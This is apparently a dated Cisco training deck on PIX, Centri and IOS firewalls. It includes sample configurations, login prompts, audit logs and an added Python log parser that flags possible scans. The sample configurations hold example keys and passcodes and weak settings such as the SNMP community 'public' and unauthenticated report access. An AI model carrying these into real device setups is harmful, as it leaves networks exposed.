On PIX manager: click Authentication, select TACACS+ server, click Add. Server IP address = 10.0.0.100, encryption key: spackle. Click OK
On PIX manager: select Authentication, click Add, select "authenticate all internal hosts" or whatever is desired. Click OK. Click Save
Assume PIN = 1234, passcode = 5551212
PIX with OTP Session
Telnet prompt:
Username: megaman
Enter passcode: 5551212
HTTP prompt (Internet Explorer):
You need a password to access this page
Resource: HTTP authentication
Username: megaman
Password: 5551212
HTTP prompt (Netscape):
Username and password required
Enter username for HTTP authentication at 172.16.50.87
User name: megaman
Password: 5551212
FTP prompt:
Connected to 172.16.50.87
220 FTP authentication 220
User (172.16.50.87:>:
331 Enter PASSCODE: 331
Password:
230 220 TS09B6F FTP server (version Cisco Micro WebServer) ready
331 Hello root, send password
230 Login user root OK 230
PIX with Three Interfaces
[Figure: the PIX joins the public network (Internet), a perimeter network and the private network. On the perimeter network sit a web server at 192.168.0.2 and an FTP server at 192.168.0.3 behind the PIX's 192.168.0.1; the private network holds 10.0.0.100 behind the PIX's 10.0.0.3. A web server for the inside network is reachable only from 172.28.0.0 and 172.16.50.0]
nameif ethernet0 outside security0
nameif ethernet1 inside security100
nameif ethernet2 dmz security50
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
hostname pixfirewall
failover
names
name 192.168.0.2 webserver
name 192.168.0.3 ftpserver
pager lines 24
syslog output 20.3
no syslog console
interface ethernet0 auto
interface ethernet1 auto
interface ethernet2 auto
ip address outside 172.16.50.3 255.255.255.0
ip address inside 10.0.0.3 255.0.0.0
ip address dmz 192.168.0.1 255.255.255.0
arp timeout 14400
global (outside) 1 172.16.50.76-172.16.50.85
global (dmz) 1 192.168.0.90-192.168.0.99
nat (inside) 1 10.0.0.0 255.0.0.0
nat (dmz) 1 192.168.0.0 255.255.255.0
static (dmz,outside) 172.16.50.76 webserver 200 200
static (dmz,outside) 172.16.50.77 ftpserver
static (inside,outside) 172.16.50.80 10.0.0.110
conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0
conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0
age 10
rip outside passive
no rip outside default
rip inside passive
rip inside default
no rip dmz passive
rip dmz default
route outside 0.0.0.0 0.0.0.0 172.16.50.1 1
timeout xlate 24:00:00 conn 12:00:00 udp 0:02:00
timeout rpc 0:10:00 h323 0:05:00 uauth 0:05:00
tacacs-server host 10.0.0.100 abc
aaa authentication any inbound 0.0.0.0 0.0.0.0 tacacs+
no snmp-server location
no snmp-server contact
snmp-server community public
telnet 10.0.0.100 255.255.255.255
mtu outside 1500
mtu inside 1500
mtu dmz 1500
: end
Centri Firewall
Windows NT firewall
ICSA certified
Version 4.0.2 now shipping!
Evaluation software on the web at: http://www.cisco.com/centri
Ease of Use
Installation wizard: steps through initial configuration
Predefined security policies
Graphical policy manager: drag-and-drop security policies
Secure remote administration
Secure Remote Administration
Secure remote admin: MS authenticated RPC
Centri's asymmetric authentication
From trusted or untrusted sides
[Figure: administration of the firewall from private networks, from the ISP network, and across the Internet]
Reporting
Reports may be run on demand and scheduled to run at fixed times (e.g. Mondays at 2 a.m.)
Reports are presented in HTML or text and may be stored on the web server in the product (examiner) or sent to an e-mail address
To view reports it is simplest to use the embedded browser in Centri, though you may use another browser if desired (port 8080, no authentication)
There are three types of reports:
Warning (security issues and product oddities)
Service (statistical details per service, no aggregates)
Connection (polls for open connections per service, no aggregates)
Flexible Security Policies
[Figure: a security policy (open, restrictive or closed) can be selected by IP address (e.g. 161.44.75.12), by NT username, by application, or by time of day]
Centri Firewall Architecture
Kernel proxies implemented in the Windows NT kernel
Custom TCP/IP stack: packet-filtering speed with proxy functionality
Protects against common vulnerabilities in Windows NT (WinNuke, NetBIOS holes, etc.)
Intercept architecture: preservation of the original network stack
Firewall communication is also protected
Capability of running servers on the firewall
Centri Firewall Design
[Figure: inside the NT kernel, a device driver and the kernel proxy (with content filtering and authentication) sit between the outside interface 192.204.18.2 and the inside interface 10.0.0.1; a virtual interface 10.0.0.2 connects the Microsoft TCP/IP stack, on which third-party applications (DNS, web, e-mail) and other services run at the application layer]
Kernel Proxy Sample Inbound Data Flow
[Figure: in kernel space, traffic from the untrusted network adapter (205.50.50.2) enters the external protocol stack, passes the interceptor and the security verification engine, and continues through the internal protocol stack to the trusted network adapter (10.0.0.1) and the trusted server. A local communication channel links the kernel proxy to the Centri virtual adapter (10.0.0.2), above which the native Microsoft NT TCP/IP stack, Winsock, the Winsock applications (e.g. web, DNS, mail servers) and the Centri agents (e.g. authentication) run in application space]
Kernel Proxy Sample Native Stack Data Flow
[Figure: the same components as in the inbound flow; here traffic for the firewall host itself passes the interceptor and the security verification engine, then crosses the local communication channel to the Centri virtual adapter (10.0.0.2) and goes up the native Microsoft NT TCP/IP stack and Winsock to the Winsock applications and Centri agents]
Site-Based Model
Policy enforcement occurs when information passes between sites (intersite), not within the same site (intrasite)
Rules are checked when information leaves one site for another
Install creates two sites, trusted and Internet, which may be expanded upon post-install (e.g. adding an isolated service network [DMZ])
The local stack is tied by a virtual wire to a trusted site
[Figure: policy rules are checked at the boundaries between the trusted site, the Internet site and an isolated service network]
Eight Kernel Proxies
IP: source/destination checks, ping-of-death prevention, IP spoof prevention
ICMP: message type
TCP: port check, SYN flood prevention
UDP: port check
SMTP: nested routing blocking, minimal protocol set, similar to Mail Guard
FTP: inline user authentication, non-transparent proxy mode, allowed action checks
Telnet: inline user authentication, non-transparent proxy mode, port check
HTTP: inline user authentication, URL filtering, Java/ActiveX/JavaScript blocking, allowed action checks
Centri Summary
High-performance kernel proxy firewall
Uses four breakthroughs in firewall user interface design: natural network views, bundled applications, policy builder, drag-and-drop policy deployment
Integrates well into the Microsoft environment: policies based on NT domains, groups, and users
Cisco IOS
Integrated security is not a new concept
Existing Cisco IOS security technologies support: perimeter security and access control; identification and user authentication; denial of service (DoS) protection; virtual private networking; reporting
Existing Cisco IOS Perimeter Security Technologies
Access control lists
Network address translation (NAT)
VPN technologies: authentication, network-layer encryption, tunneling (GRE, L2F), peer router
Policy-based multi-interface support
Event logging
TACACS+/RADIUS authentication
Lock-and-key security
Cisco IOS Firewall Feature Set: Enhanced Security for the Intelligent Internet
Context-Based Access Control (CBAC): secure, per-application filtering
Support for advanced protocols (H.323, SQLnet, RealAudio, etc.)
Control downloading of Java applets
Denial of service detection and prevention
Real-time alerts
TCP/UDP transaction log
Configuration and management
Enhanced Security for the Intelligent Internet: Benefits
Integrated solution: access and security
No new hardware required: one box to manage
Full routing functionality
Applicable for Internet, intranet and extranet security
Full Cisco IOS software interoperability: customers can leverage their knowledge of Cisco IOS software
Low cost of implementation and ownership for the Cisco-installed base
Context-Based Access Control (CBAC)
Tracks state and context of network connections to secure traffic flow
Inspects data coming into or leaving the router
Allows connections to be established by temporarily opening ports based on payload inspection
Return packets are authorized for the particular connection only, via a temporary ACL
Context-Based Access Control (CBAC) Application Support
Transparent support for common TCP/UDP Internet services, including WWW, Telnet, SNMP, finger, etc.
FTP
TFTP
SMTP
Java blocking
BSD R-cmds
Oracle SQL*Net
Remote procedure call (RPC)
Multimedia applications: VDOnet's VDOLive, RealNetworks' RealAudio, Intel's Internet Video Phone (H.323), Microsoft's NetMeeting (H.323), Xing Technologies' Streamworks, White Pine's CU-SeeMe
IOS Firewall Transaction Log
Provides audit trail for tracking transactions
Recognition of session and port
Information is sortable via tag
Sample:
Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33192) sent 22 bytes -- responder (172.166.129.11:25) sent 208 bytes
Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33194) sent 336 bytes -- responder (172.166.129.11:25) sent 325 bytes
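As an added Python example (not from the deck), a parser for the audit-trail lines above that pulls out the tag, initiator, responder and byte counts, aggregates per responder service, and flags sessions in which no data moved in either direction. The two lines from the slide are used as input alongside one constructed line (tag 126); the record field names, the summary layout and the flagging rule are this example's assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

AUDIT_LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<tag>\d+): %FW-6-SESS_AUDIT_TRAIL: "
    r"(?P<proto>\w+) session initiator \((?P<iip>[\d.]+):(?P<iport>\d+)\) sent (?P<ibytes>\d+) bytes"
    r"(?: --)? responder \((?P<rip>[\d.]+):(?P<rport>\d+)\) sent (?P<rbytes>\d+) bytes$"
)


def parse_audit_trail(text: str) -> List[dict]:
    """Turn %FW-6-SESS_AUDIT_TRAIL lines into records; lines that don't match are skipped."""
    records = []
    for line in text.splitlines():
        m = AUDIT_LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        records.append({
            "tag": int(d["tag"]), "time": d["ts"], "proto": d["proto"],
            "initiator": (d["iip"], int(d["iport"])), "initiator_bytes": int(d["ibytes"]),
            "responder": (d["rip"], int(d["rport"])), "responder_bytes": int(d["rbytes"]),
        })
    return records


def summarize_by_service(records: List[dict]) -> Dict[str, Dict[str, int]]:
    """Sessions and bytes in each direction per responder ip:port."""
    summary: Dict[str, Dict[str, int]] = defaultdict(
        lambda: {"sessions": 0, "to_responder": 0, "from_responder": 0})
    for r in records:
        key = "%s:%d" % r["responder"]
        summary[key]["sessions"] += 1
        summary[key]["to_responder"] += r["initiator_bytes"]
        summary[key]["from_responder"] += r["responder_bytes"]
    return dict(summary)


def empty_sessions(records: List[dict]) -> List[int]:
    """Tags of sessions that carried no data either way: worth a look, since a
    completed handshake with nothing exchanged is what a connect scan leaves behind."""
    return [r["tag"] for r in records
            if r["initiator_bytes"] == 0 and r["responder_bytes"] == 0]


# The two lines from the slide plus one constructed line (tag 126) for the empty case.
SAMPLE_LOG = """\
Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33192) sent 22 bytes -- responder (172.166.129.11:25) sent 208 bytes
Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33194) sent 336 bytes -- responder (172.166.129.11:25) sent 325 bytes
Sep 10 13:09:01 sifi-5 126: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33201) sent 0 bytes -- responder (172.166.129.11:23) sent 0 bytes
"""

if __name__ == "__main__":
    recs = parse_audit_trail(SAMPLE_LOG)
    print(summarize_by_service(recs))
    print("empty sessions:", empty_sessions(recs))
```

Because the tag is parsed as an integer, records can be sorted or joined back to the device's sequence, which is the "sortable via tag" property the slide mentions.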
Sample Configuration
ip inspect name pri-net tcp
ip inspect name pri-net udp
ip inspect name pri-net ftp
ip inspect name pri-net h323
ip inspect name pri-net realaudio
ip inspect name pri-net streamworks
ip inspect name pri-net vdolive
ip inspect name pri-net cuseeme
ip inspect name pri-net http java-list 10
interface e0
 ip inspect pri-net in
 ip access-group 101 out
access-list 10 permit 172.34.7.130
access-list 101 deny ip any any
CFMI
Common security management for enterprise infrastructure
Centralized visual policy development, management, and enforcement
Adaptive configuration of network infrastructure
Integrate existing and future authentication technologies and Cisco firewall technologies
Support for scalable configuration of IPSEC and IKE technologies
Physical network representation
Cisco's Firewall Family
Cisco IOS Firewall feature set: advanced, rich security option for Cisco IOS software, with full routing and WAN access capabilities, that integrates seamlessly with existing Cisco IOS software-based environments
Centri Firewall: high-performance, flexible, Windows NT-based security software with intuitive user-based policy rules. Easy to install, configure, and manage
PIX Firewall: highest-performance, scalable, dedicated security appliance with the most advanced features and application support, fault tolerance
References
www.cisco.com/univercd/cc/td/doc/product/software/ios112/112cg_cr/2cbook/2cacclst.htm: describes access lists and lock and key
www.cisco.com/warp/public/701/31.html: increasing security on IP networks
www.cisco.com/warp/public/707/4.html: strategies to protect against TCP SYN DoS attacks
www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/113t/113t_3/firewall.htm: Cisco IOS Firewall feature set docs
www.cisco.com/warp/public/458/41.html: NAT FAQ